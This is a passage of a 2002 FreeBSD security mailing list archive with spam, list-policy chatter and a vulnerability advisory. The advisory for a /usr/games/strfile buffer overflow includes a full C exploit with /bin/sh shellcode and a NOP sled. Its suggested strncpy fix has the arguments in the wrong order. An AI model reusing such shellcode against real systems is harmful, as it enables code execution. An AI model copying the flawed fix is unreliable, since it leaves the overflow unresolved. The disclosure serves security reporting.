YWwgR0ggRm9ybXVsYSBhdmFpbGFibGUtLWJhY2tlZCB1cCBieSA3IHllYXJz IG9mIHJlc2VhcmNoDQogLS10byBoZWxwIHlvdSBhY2hpZXZlIGFsbCB0aGlz ICYgbW9yZSENCiANClNUQVJUIFJFVkVSU0lORyBUSEUgQUdJTkcgUFJPQ0VT UyBUT0RBWSENCg0KSW4gdGhvdXNhbmRzIG9mIGNsaW5pY2FsIHN0dWRpZXMg KHdpdGggbm8gc2lkZQ0KZWZmZWN0cyksIEdIIGhhcyBiZWVuIHNob3duDQog dG8gYWNjb21wbGlzaCB0aGUgZm9sbG93aW5nOg0KDQogKiBSZWR1Y2UgYm9k eSBmYXQgJiBidWlsZCBsZWFuIG11c2NsZSB3aXRob3V0IGV4ZXJjaXNlIQ0K ICogRW5oYW5jZSBzZXh1YWwgcGVyZm9ybWFuY2UNCiAqIFJlbW92ZSB3cmlu a2xlcyBhbmQgY2VsbHVsaXRlDQogKiBMb3dlciBibG9vZCBwcmVzc3VyZSBh bmQgaW1wcm92ZSBjaG9sZXN0ZXJvbCBwcm9maWxlDQogKiBJbXByb3ZlIHNs ZWVwLCB2aXNpb24gYW5kIG1lbW9yeQ0KICogUmVzdG9yZSBoYWlyIGNvbG9y IGFuZCBncm93dGgNCiAqIFN0cmVuZ3RoZW4gdGhlIGltbXVuZSBzeXN0ZW0N CiAqIEluY3JlYXNlIGVuZXJneSBhbmQgY2FyZGlhYyBvdXRwdXQNCiAqIFR1 cm4gYmFjayB5b3VyIGJvZHkncyBiaW9sb2dpY2FsIHRpbWUgY2xvY2sgMTAt MjANCiAgIHllYXJzIGluIDYgbW9udGhzIHVzZSAhIQ0KIA0KIEZvciBtb3Jl IEZSRUUgSU5GT1JNQVRJT04gb3IgdG8gT1JERVIgUFJPRFVDVCwgcGxlYXNl DQogdmlzaXQgb3VyIHdlYiBzaXRlIGJ5IGNsaWNraW5nIG9uIHRoaXMgbnVt YmVyZWQgbGluazoNCiBodHRwOi8vNjYuMTA3LjEwNy42DQogDQogb3IgQ0FM TCBvdXIgMjQgSFIgVm9pY2VtYWlsIHdpdGggeW91ciBuYW1lLCBudW1iZXIg Jg0KIHRoZSBiZXN0IHRpbWVzIGZvciB1cyB0byBjYWxsIHlvdTogKDg4OCkg NjI0LTk4NTINCiBUaGFuayB5b3UhDQogDQogV2hvbGVzYWxlIElucXVpcmll cyBhcmUgYWxzbyBXRUxDT01FIChXZSBhcmUgbm90IE1MTSkuDQogDQoNCnRv IGJlIHJlbW92ZWQgZnJvbSBvdXIgc3Vic2NyaWJlciBsaXN0IG1haWx0bzpy ZW1tZTYyOThAeWFob28uY29tP3N1YmplY3Q9cmVtb3ZlIA0KIHRoYW5rIHlv dQ0KDQoNCjA5NTJnT2xvNS0zMzhESXJZNTgzNWFWdUpsMjQNCg== To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 5 11:28:16 2002 Delivered-To: freebsd-security@freebsd.org Received: from kabru.pinn.net (kabru.pinn.net [198.252.201.11]) by hub.freebsd.org (Postfix) with ESMTP id E0B0C37B618 for ; Sun, 5 May 2002 11:27:40 -0700 (PDT) Received: from matterhorn.pinn.net (matterhorn.pinn.net [198.252.201.8]) by kabru.pinn.net (8.11.3/8.9.1) with ESMTP id g45IPY101745 for ; Sun, 5 May 2002 14:25:34 -0400 (EDT) Received: (from kanedev@localhost) by matterhorn.pinn.net (8.9.3+Sun/8.8.8) id OAA29642; Sun, 5 May 2002 14:31:47 -0400 (EDT) Date: Sun, 5 May 2002 14:31:47 -0400 (EDT) Message-Id: <200205051831.OAA29642@matterhorn.pinn.net> To: security@freebsd.org From: Kane Marie Fine Arts Gallery Reply-To: Kane Marie Fine Arts Gallery Subject: You've Been Added! MIME-Version: 1.0 Content-Type: multipart/alternative; boundary=boundary42 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --boundary42 Content-Type: text/plain; charset="ISO-8859-1" Content-Transfer-Encoding: 8bit This message is to confirm the addition of your email address: security@freebsd.org to the Kane Marie Fine Arts Gallery Subscribe Me mailing list. If you feel you have received this notice in error, please visit the Kane Marie Fine Arts Gallery Subscribe Me mailing list at our website: http://www.kanemarie.com to remove yourself automatically, or click the link below: http://www.kanemarie.com/cgi-bin/bulkmail/s.pl?r=1&l=1&e=security=:freebsd.org Thank you, Kane Marie Fine Arts Gallery --boundary42-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 5 11:28:34 2002 Delivered-To: freebsd-security@freebsd.org Received: from kabru.pinn.net (kabru.pinn.net [198.252.201.11]) by hub.freebsd.org (Postfix) with ESMTP id A178137B671 for ; Sun, 5 May 2002 11:27:56 -0700 (PDT) Received: from matterhorn.pinn.net (matterhorn.pinn.net [198.252.201.8]) by kabru.pinn.net (8.11.3/8.9.1) with ESMTP id g45IPq101800 for ; Sun, 5 May 2002 14:25:52 -0400 (EDT) Received: (from kanedev@localhost) by matterhorn.pinn.net (8.9.3+Sun/8.8.8) id OAA29652; Sun, 5 May 2002 14:32:05 -0400 (EDT) Date: Sun, 5 May 2002 14:32:05 -0400 (EDT) Message-Id: <200205051832.OAA29652@matterhorn.pinn.net> To: security@freebsd.org From: Kane Marie Fine Arts Gallery Reply-To: Kane Marie Fine Arts Gallery Subject: You've Been Removed! MIME-Version: 1.0 Content-Type: multipart/alternative; boundary=boundary42 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --boundary42 Content-Type: text/plain; charset="ISO-8859-1" Content-Transfer-Encoding: 8bit This message is to confirm the removal of your email address: security@freebsd.org from the Kane Marie Fine Arts Gallery Subscribe Me mailing list. We're sorry to see you go! If you feel you have received this notice in error, please visit the Kane Marie Fine Arts Gallery Subscribe Me mailing list at our website: http://www.kanemarie.com to add yourself automatically, or click on the link below to automatically re-subscribe yourself: http://www.kanemarie.com/cgi-bin/bulkmail/s.pl?a=1&l=1&e=security=:freebsd.org Thank you, Kane Marie Fine Arts Gallery --boundary42-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 5 11:40:59 2002 Delivered-To: freebsd-security@freebsd.org Received: from hendrix.bsd.st (ADSL144-242.advancedsl.com.ar [200.63.144.242]) by hub.freebsd.org (Postfix) with SMTP id 0845537B405 for ; Sun, 5 May 2002 11:40:55 -0700 (PDT) Received: (qmail 4825 invoked from network); 5 May 2002 18:41:21 -0000 Received: from unknown (HELO depot) (10.0.0.1) by 0 with SMTP; 5 May 2002 18:41:21 -0000 Message-ID: <00c801c1f464$648fb0d0$01cca8c0@depot> From: "Juan P. Villa (DATAFULL.COM)" To: References: <3CD54236.4DA21BBE@yahoo.com> Subject: OpenSSH ports: why two? Date: Sun, 5 May 2002 15:40:55 -0300 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hello, I would like to know what's exactly the difference between openssh-portable and openssh ports. I don't like the banner that default sshd has, and I don't like to stick with older versions (2.9 or 2.3) even if they are patched. So, I overwrite base install with openssh-portable on a regular basis, but I cannot find the sense of the other "non-portable" port. (BTW... I mean... if one is "portable", that means the other one isn't, right? ;-) ). Please don't take the last affirmation seriously... it's just a nonsense to stress that 2 ports for the same goal are rather confusing. Besides this, are there any reasons to stick with the default OpenSSH version included on FreeBSD source tree instead of building the port? (considering a syncronized source tree, following the respective RELENG_4_x branch, RELENG_4_5 in this case). Best Regards. Juan Pablo Villa Network Administrator Datafull.com - 4kbyte S.A. Buenos Aires - Argentina To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 5 13:14:22 2002 Delivered-To: freebsd-security@freebsd.org Received: from kabru.pinn.net (kabru.pinn.net [198.252.201.11]) by hub.freebsd.org (Postfix) with ESMTP id 1D6AD37B40A for ; Sun, 5 May 2002 13:14:15 -0700 (PDT) Received: from matterhorn.pinn.net (matterhorn.pinn.net [198.252.201.8]) by kabru.pinn.net (8.11.3/8.9.1) with ESMTP id g45KC9118767 for ; Sun, 5 May 2002 16:12:09 -0400 (EDT) Received: (from kanedev@localhost) by matterhorn.pinn.net (8.9.3+Sun/8.8.8) id QAA03310; Sun, 5 May 2002 16:18:25 -0400 (EDT) Date: Sun, 5 May 2002 16:18:25 -0400 (EDT) Message-Id: <200205052018.QAA03310@matterhorn.pinn.net> To: security@freebsd.org From: Kane Marie Fine Arts Gallery Reply-To: Kane Marie Fine Arts Gallery Subject: You've Been Removed! MIME-Version: 1.0 Content-Type: multipart/alternative; boundary=boundary42 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --boundary42 Content-Type: text/plain; charset="ISO-8859-1" Content-Transfer-Encoding: 8bit This message is to confirm the removal of your email address: security@freebsd.org from the Kane Marie Fine Arts Gallery Subscribe Me mailing list. We're sorry to see you go! If you feel you have received this notice in error, please visit the Kane Marie Fine Arts Gallery Subscribe Me mailing list at our website: http://www.kanemarie.com to add yourself automatically, or click on the link below to automatically re-subscribe yourself: http://www.kanemarie.com/cgi-bin/bulkmail/s.pl?a=1&l=1&e=security=:freebsd.org Thank you, Kane Marie Fine Arts Gallery --boundary42-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 5 13:14:17 2002 Delivered-To: freebsd-security@freebsd.org Received: from kabru.pinn.net (kabru.pinn.net [198.252.201.11]) by hub.freebsd.org (Postfix) with ESMTP id 7CE9A37B406 for ; Sun, 5 May 2002 13:14:09 -0700 (PDT) Received: from matterhorn.pinn.net (matterhorn.pinn.net [198.252.201.8]) by kabru.pinn.net (8.11.3/8.9.1) with ESMTP id g45KBw118737 for ; Sun, 5 May 2002 16:11:58 -0400 (EDT) Received: (from kanedev@localhost) by matterhorn.pinn.net (8.9.3+Sun/8.8.8) id QAA03303; Sun, 5 May 2002 16:18:13 -0400 (EDT) Date: Sun, 5 May 2002 16:18:13 -0400 (EDT) Message-Id: <200205052018.QAA03303@matterhorn.pinn.net> To: security@freebsd.org From: Kane Marie Fine Arts Gallery Reply-To: Kane Marie Fine Arts Gallery Subject: You've Been Added! MIME-Version: 1.0 Content-Type: multipart/alternative; boundary=boundary42 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --boundary42 Content-Type: text/plain; charset="ISO-8859-1" Content-Transfer-Encoding: 8bit This message is to confirm the addition of your email address: security@freebsd.org to the Kane Marie Fine Arts Gallery Subscribe Me mailing list. If you feel you have received this notice in error, please visit the Kane Marie Fine Arts Gallery Subscribe Me mailing list at our website: http://www.kanemarie.com to remove yourself automatically, or click the link below: http://www.kanemarie.com/cgi-bin/bulkmail/s.pl?r=1&l=1&e=security=:freebsd.org Thank you, Kane Marie Fine Arts Gallery --boundary42-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 5 13:54:33 2002 Delivered-To: freebsd-security@freebsd.org Received: from mail.fpsn.net (mail.fpsn.net [63.224.69.57]) by hub.freebsd.org (Postfix) with ESMTP id 7BB4237B407 for ; Sun, 5 May 2002 13:54:30 -0700 (PDT) Received: from fpsn.net (mirc-sucks@unixgr.com [63.224.69.60]) (authenticated) by mail.fpsn.net (8.11.6/8.11.6) with ESMTP id g45KsRI62804 for ; Sun, 5 May 2002 14:54:27 -0600 (MDT) Message-ID: <3CD59C0A.306681E3@fpsn.net> Date: Sun, 05 May 2002 14:54:34 -0600 From: Colin Faber Organization: fpsn.net, Inc. (http://www.fpsn.net) X-Mailer: Mozilla 4.78 [en] (Windows NT 5.0; U) X-Accept-Language: en MIME-Version: 1.0 Cc: security@FreeBSD.ORG Subject: Re: You've Been Removed! References: <200205051832.OAA29652@matterhorn.pinn.net> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Maybe it's time to re-evaluate the way the list rules are setup? It would appear there some some punk hell bent against this list. Possibly a subscribers only-post list? Kane Marie Fine Arts Gallery wrote: -- Colin Faber (303) 736-5160 fpsn.net, Inc. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 5 14:12:13 2002 Delivered-To: freebsd-security@freebsd.org Received: from user205.net239.fl.sprint-hsd.net (user205.net239.fl.sprint-hsd.net [209.26.20.205]) by hub.freebsd.org (Postfix) with SMTP id 03BB337B4CF for ; Sun, 5 May 2002 14:11:35 -0700 (PDT) Received: (qmail 20542 invoked by uid 85); 5 May 2002 21:11:42 -0000 Received: from scorpio@drkshdw.org by scorpio.DrkShdw.org by uid 89 with qmail-scanner-1.10 (uvscan: v4.1.60/v4199. . Clear:0. Processed in 0.911075 secs); 05 May 2002 21:11:42 -0000 Received: from jeff.home.lan (HELO jeffrey) (192.168.134.2) by user205.net239.fl.sprint-hsd.net with SMTP; 5 May 2002 21:11:41 -0000 Message-ID: <00be01c1f479$75692610$0286a8c0@jeffrey> From: "Jeff Palmer" To: References: <200205051832.OAA29652@matterhorn.pinn.net> <3CD59C0A.306681E3@fpsn.net> Subject: Re: You've Been Removed! Date: Sun, 5 May 2002 17:11:44 -0400 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org We've had to deal with this kind of stuff before. Lets not make a big issue out of this series of mails. Just ignore it, or create a procmail filter for it please. This isn't the first time, nor will it be the last time for such an event ;-) Jeff Palmer ----- Original Message ----- From: "Colin Faber" Cc: Sent: Sunday, May 05, 2002 4:54 PM Subject: Re: You've Been Removed! > Maybe it's time to re-evaluate the way the list rules are setup? It > would appear there some some punk hell bent against this list. > > Possibly a subscribers only-post list? > > > > Kane Marie Fine Arts Gallery wrote: > > > > -- > Colin Faber > (303) 736-5160 > fpsn.net, Inc. > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 5 14:33:30 2002 Delivered-To: freebsd-security@freebsd.org Received: from uadvg134.mx.net (uadvg134.mx.net [165.212.11.134]) by hub.freebsd.org (Postfix) with SMTP id CA92337B412 for ; Sun, 5 May 2002 14:33:19 -0700 (PDT) Received: (qmail 1756 invoked from network); 5 May 2002 21:33:31 -0000 Received: from uadvg133.cms.usa.net (165.212.11.133) by corprelay.cms.usa.net with SMTP; 5 May 2002 21:33:31 -0000 Received: USA.NET MXFirewall, messaging filters applied; Sun, 05 May 2002 21:33:25 GMT Received: from uwdvg007.cms.usa.net [165.212.8.7] by uadvg133.cms.usa.net via mtad (CM.1201.1.04A) with ESMTP id 832geeVhV0499M33; Sun, 05 May 2002 21:33:22 GMT Message-ID: <20020505213314.8762.qmail@uwdvg007.cms.usa.net> Received: from 192.115.8.147 [192.115.8.147] by uwdvg007.cms.usa.net (USANET web-mailer CM.0402.1.01C); Sun, 05 May 2002 21:33:14 -0000 Date: Sun, 05 May 2002 22:33:14 +0100 From: ReDeeMeR To: Subject: Buffer overflow in /usr/games/strfile X-Mailer: USANET web-mailer (CM.0402.1.01C) Mime-Version: 1.0 Content-Type: multipart/mixed; boundary="----NetAddressPart-00--=_eVho8912S073041adfc" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org This is a multi-part message in MIME format. ------NetAddressPart-00--=_eVho8912S073041adfc Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable Hi, Below is an advisory for a vulnerable buffer in the /usr/games/strfile bi= nary which can be overflowed. I emailed this information to security-officer@freebsd.org on 28/04/02 and am yet to receive a reply. T= he reason I am posting this so early is that it is not really a major securi= ty risk (the binary file in question is not suid), but it is a practice of b= ad coding so I felt it my duty to make you aware of it. Also find attached my proof of concept code. Thanks, -ReDeeMeR- --begin paste-- -=3D[ g0tr00t.net advisory ]=3D- FreeBSD /usr/games/strfile buffer overflow ReDeeMeR (redeemer@g0tr00t.net) http://www.g0tr00t.net http://bse.die.ms/~redeemer/releases/ReDeeMeR/advisories/strfilexp.txt -=3D[ Date discovered ]=3D- 24/04/02 -=3D[ Discovered by ]=3D- ReDeeMeR (redeemer@g0tr00t.net) -=3D[ Outline ]=3D- = = FreeBSD /usr/games/strfile contains a vulnerable buffer which can be overflowed. The games package is NOT installed by default. The strfile binary is NOT suid (4755), thus, the security risk here is no= t great. -=3D[ Impact ]=3D- No extra privileges can be gained. -=3D[ Affected ]=3D- Successfully tested on FreeBSD4.5-RELEASE, suspected vulnerability on ALL= FreeBSD machines which ship this software. -=3D[ Vendor Status ]=3D- FreeBSD (http://www.freebsd.org) contacted on 28/04/02 No reply after 7 days, so released this advisory due to the fact that thi= s is not a major = security issue. Advisory released on 05/05/02 -=3D[ Description ]=3D- /usr/games/strfile ("strfile" hereafter) is vulnerable to a standard buff= er overflow. The problem exists due to insufficient checking procedures on command lin= e input. The = vulnerability exists in a poorly utilised strcpy() function (found on lin= e 310 of strfile.c) which reads from an unchecked buffer: (void) strcpy(Outfile, *argv); Thus, a large input (greater than allocated buffer space) will cause strf= ile to segfault. This in turn can lead to the execution of arbitrary commands. A user can cause strfile to crash by inputting a string of length equal t= o or greater = than 1069 bytes, and an input of equal to or greater than 1088 bytes in l= ength will cause the eip of strcpy() to be overwritten with our input. This can be further investigated with the use of gdb, although I am not going to paste gdb output in this advisory. To reproduce this bug, execute the following command: FreeBSD$ /usr/games/strfile `perl -e 'print "A" x 1069'` -=3D[ Proof of concept ]=3D- Proof of concept code can be located at: = http://bse.die.ms/~redeemer/releases/ReDeeMeR/exploits/strfilexp.c If the program is successfully exploited, the terminal output should look= something like this: bash-2.05a$ uname -a FreeBSD 4.5-RELEASE FreeBSD 4.5-RELEASE #0: Sat Apr 20 14:14:37 BST 2002 = redeemer@:/usr/src/sys/compile/TOX i386 bash-2.05a$ id uid=3D31337(redeemer) gid=3D31337(redeemer) groups=3D31337(redeemer), 0(w= heel) bash-2.05a$ ./strfilexp ReDeeMeR's proof of concept code for /usr/games/strfile Using return addr: 0xbfbffb0c Buffer size: 2000 $ id uid=3D31337(redeemer) gid=3D31337(redeemer) groups=3D31337(redeemer), 0(w= heel) $ *Notice that no extra privileges have been gained (due to strfile NOT bei= ng suid)* -=3D[ Fix ]=3D- A suggested fix was sent by me to FreeBSD to use strncpy() instead of strcpy(). Replace (void) strcpy(Outfile, *argv); with: (void) strncpy(Outfile, sizeof(Outfile), *argv); FreeBSD are yet to respond to my e-mail, but I will assume that they rece= ived it and have implemented an update in strfile.c within the FreeBSD-current branch. -=3D[ Greets ]=3D- Thanks to: The Itch - For various mentoring and for hosting g0tr00t.net. keoki - Someone to collaborate/compete with. Chawmp - " " " " " Greets: #g0tr00t, #ch0wn, #Turbo-IRC, #NeXT. --end paste-- ------NetAddressPart-00--=_eVho8912S073041adfc Content-Type: text/plain; name="strfilexp.c" Content-Transfer-Encoding: 7bit Content-Disposition: inline; filename="strfilexp.c" /* Proof of concept code for /usr/games/strfile [28/04/02] * Does not gain root shell, merely a proof of concept code * Tested on FreeBSD4.5-RELEASE * Find the advisory at * http://bse.die.ms/~redeemer/releases/ReDeeMeR/advisories/strfilexp.txt * * redeemer@g0tr00t.net * http://www.g0tr00t.net * http://bse.die.ms/~redeemer/legal.shtml applies to this file. */ #include #include #include #define MOO 2000 /* RET size */ #define LEN 2048 /* EGG zie */ #define NOP 0x90 /* FreeBSD execve shellcode */ char shellcode[]= "\xeb\x17\x5b\x31\xc0\x88\x43\x07\x89\x5b" "\x08\x89\x43\x0c\x50\x8d\x53\x08\x52\x53" "\xb0\x3b\x50\xcd\x80\xe8\xe4\xff\xff\xff" "/bin/sh"; int main(void) { char *buff, *egg, *ptr; long *addr_pointer, addr; int bsize = MOO, eggsize = LEN, get_sp = (int)&get_sp, i; buff = malloc(bsize); egg = malloc(eggsize); printf("ReDeeMeR's proof of concept code for /usr/games/strfile\n"); printf("Using return addr: \t0x%x\n", get_sp); printf("Buffer size: \t\t%d\n", bsize); ptr = buff; addr_pointer = (long *)ptr; for (i = 0; i < bsize; i += 4 ) { *(addr_pointer++) = get_sp; } ptr = egg; for (i = 0; i < eggsize - strlen(shellcode) - 1; i++) { *(ptr++) = NOP; } for (i = 0; i < strlen(shellcode); i++) { *(ptr++) = shellcode[i]; } buff[bsize - 1] = '\0'; egg[eggsize - 1] = '\0'; memcpy(egg, "EGG=", 4); putenv(egg); execl("/usr/games/strfile", "strfile", buff, NULL); return(0); } /* EOF */ ------NetAddressPart-00--=_eVho8912S073041adfc-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 5 14:38:40 2002 Delivered-To: freebsd-security@freebsd.org Received: from mcqueen.wolfsburg.de (pns.wobline.de [212.68.68.5]) by hub.freebsd.org (Postfix) with ESMTP id A5BA437B405 for ; Sun, 5 May 2002 14:38:34 -0700 (PDT) Received: from k6-2-300.tisys.org (ppp-224.wobline.de [212.68.69.235]) by mcqueen.wolfsburg.de (8.11.3/8.11.3/sh-2002041503) with ESMTP id g45LcEI16832; Sun, 5 May 2002 23:38:14 +0200 Received: from daemon.tisys.org (palomino-1533.tisys.org [192.168.0.3]) by k6-2-300.tisys.org (8.12.3/8.12.3) with ESMTP id g45Ldlo2080421; Sun, 5 May 2002 23:39:48 +0200 (CEST) (envelope-from nils@daemon.tisys.org) Received: (from nils@localhost) by daemon.tisys.org (8.12.3/8.12.3/Submit) id g45LcWuA008655; Sun, 5 May 2002 23:38:32 +0200 (CEST) Date: Sun, 5 May 2002 23:37:56 +0200 From: Nils Holland To: Colin Faber Cc: security@FreeBSD.ORG Subject: Re: You've Been Removed! Message-ID: <20020505233756.A8532@daemon.tisys.org> References: <200205051832.OAA29652@matterhorn.pinn.net> <3CD59C0A.306681E3@fpsn.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5.1i In-Reply-To: <3CD59C0A.306681E3@fpsn.net>; from cfaber@fpsn.net on Sun, May 05, 2002 at 02:54:34PM -0600 X-Operating-System: FreeBSD palomino-1533.tisys.org 4.6-PRERELEASE FreeBSD 4.6-PRERELEASE X-Machine-Uptime: 11:24PM up 13:46, 1 user, load averages: 0.06, 0.08, 0.06 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Sun, May 05, 2002 at 02:54:34PM -0600, Colin Faber stood up and spoke: > Maybe it's time to re-evaluate the way the list rules are setup? It > would appear there some some punk hell bent against this list. > > Possibly a subscribers only-post list? This issue comes up every now and then, mostly when viruses or other spam gets sent to the FreeBSD lists (though this constantly repeating "You've been added / You've been removed) thing was the most interesting thing I saw in the last few months ;-) Anyway, my opinion has always been that *all* FreeBSD lists should be in "subscribers may only post" mode, while FreeBSD-questions should remain open for all, as many people only see that list's address mentioned in the default motd and post messages to it without wanting to be constantly signed up. However, for the other FreeBSD lists where the majority of users are not "I-only-post-when-I-have-a-problem" folks, but rather "core members" (i.e. constantly subscribed), I guess that if these list only granted posting access to subscribers, a lot of hassles could be saved. Greetings Nils -- Nils Holland Ti Systems - http://www.tisys.org Addicted to computing since 1987 High on FreeBSD since 1996 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 5 15:36:29 2002 Delivered-To: freebsd-security@freebsd.org Received: from oxmail.ox.ac.uk (oxmail1.ox.ac.uk [129.67.1.2]) by hub.freebsd.org (Postfix) with ESMTP id 8E14C37B400 for ; Sun, 5 May 2002 15:36:25 -0700 (PDT) Received: from heraldgate2.oucs.ox.ac.uk ([163.1.2.50] helo=frontend2.herald.ox.ac.uk ident=exim) by oxmail.ox.ac.uk with esmtp (Exim 3.36 #1) id 174Uc4-0000Bs-01; Sun, 05 May 2002 23:36:16 +0100 Received: from dhcp1125.wadham.ox.ac.uk ([163.1.161.125] helo=piii600.wadham.ox.ac.uk) by frontend2.herald.ox.ac.uk with esmtp (Exim 3.32 #1) id 174Ubu-0003uH-00; Sun, 05 May 2002 23:36:06 +0100 X-Info-RBL1: ox.ac.uk filters email against various lists. X-Info-RBL2: If your replies bounce, try sending them to cperciva@sfu.ca Message-Id: <5.0.2.1.1.20020505224651.00afbd78@popserver.sfu.ca> X-Sender: cperciva@popserver.sfu.ca X-Mailer: QUALCOMM Windows Eudora Version 5.0.2 Date: Sun, 05 May 2002 23:27:49 +0100 To: ReDeeMeR , From: Colin Percival Subject: Re: Buffer overflow in /usr/games/strfile In-Reply-To: <20020505213314.8762.qmail@uwdvg007.cms.usa.net> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Given that this is not a security issue -- as you point out, "no extra privileges can be gained" -- this is rather off-topic for -security; nevertheless, it is less so than discussions of mailing list sender restrictions, so I'll go ahead and respond. If you look at http://www.freebsd.org/cgi/cvsweb.cgi/src/games/fortune/strfile/strfile.c you'll see the CVS log for the file in question. At present it shows that the latest change was made six weeks ago; your change has not been incorporated. This isn't really surprising, since FreeBSD is run by volunteers, and unless they are either provided with a patch or convinced that an issue is vitally important, nothing is likely to happen. You've described a problem, worked out how to fix it, described how to fix it... but you haven't completed the final two steps: Generating a patch, and submitting it as part of a Problem Report. So, here's what you should do: 1. Generate a patch for src/games/fortune/strfile/strfile.c. This means running `diff -c` on the original file and your fixed version. 2. Use send-pr to generate a problem report. Make sure the synopsis field starts with [PATCH], and run send-pr with the -a option to include your patch file. 3. Wait until a committer notices your pr and incorporates your patch. I'd also suggest that you read http://www.freebsd.org/doc/en_US.ISO8859-1/articles/problem-reports/article.html and http://www.freebsd.org/doc/en_US.ISO8859-1/articles/contributing/contrib-how.html Colin Percival To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 5 15:38: 6 2002 Delivered-To: freebsd-security@freebsd.org Received: from malkavian.org (malkavian.org [206.136.132.23]) by hub.freebsd.org (Postfix) with ESMTP id A16DA37B405 for ; Sun, 5 May 2002 15:37:52 -0700 (PDT) Received: (from rbw@localhost) by malkavian.org (8.11.6/8.11.1) id g45Mbku02734 for security@FreeBSD.ORG; Sun, 5 May 2002 18:37:46 -0400 (EDT) (envelope-from rbw@myplace.org) Date: Sun, 5 May 2002 15:37:46 -0700 From: "brian j. peterson" To: security@FreeBSD.ORG Subject: Please stop trying to unsubscribe (Was: Re: You've Been Removed!) Message-ID: <20020505153746.C35748@malkavian.org> Mail-Followup-To: security@FreeBSD.ORG References: <200205051832.OAA29652@matterhorn.pinn.net> <3CD59C0A.306681E3@fpsn.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5.1i In-Reply-To: <3CD59C0A.306681E3@fpsn.net>; from cfaber@fpsn.net on Sun, May 05, 2002 at 02:54:34PM -0600 X-URL: http://rbw.myplace.org/ Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Sun, May 05, 2002 at 02:54:34PM -0600, Colin Faber wrote: > Maybe it's time to re-evaluate the way the list rules are setup? It > would appear there some some punk hell bent against this list. > > Possibly a subscribers only-post list? it'd be nice if people simply stopped loading the unsubscribe link... since it is also the resubscribe link. every other person trying to unsubscribe security@freebsd.org from the list has been actually resubscribing... generating more email... leading to another attempt to unsubscribe... generating more email... ad nauseum. -- --===-----=======-----------=============-----------------=================== bjp aka rbw | and did you exchange a walk on part in the war rbw@myplace.org | for a lead role in a cage? ===================-----------------=============-----------=======-----===-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 5 16:27:32 2002 Delivered-To: freebsd-security@freebsd.org Received: 